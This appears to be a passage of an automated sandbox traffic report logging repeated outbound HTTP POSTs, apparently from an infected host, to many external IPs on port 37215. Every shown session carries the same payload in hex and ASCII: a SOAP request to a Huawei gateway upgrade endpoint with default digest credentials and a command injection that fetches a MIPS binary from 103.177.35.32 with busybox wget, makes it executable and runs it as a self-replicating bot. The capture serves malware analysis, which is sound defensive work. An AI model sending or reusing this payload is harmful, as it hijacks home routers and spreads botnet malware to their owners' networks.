                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.2352254114.119.225.2737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276499033 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.2343476157.140.199.2737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276501894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.2356734156.200.252.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276560068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.2337532197.191.56.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276576996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.2335936157.96.79.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276578903 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.2344850197.72.185.4337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276767015 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.2351518141.64.113.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276771069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.233706041.248.78.8837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276793003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.2340802197.120.109.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276793003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.235777641.214.153.21337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.276808023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
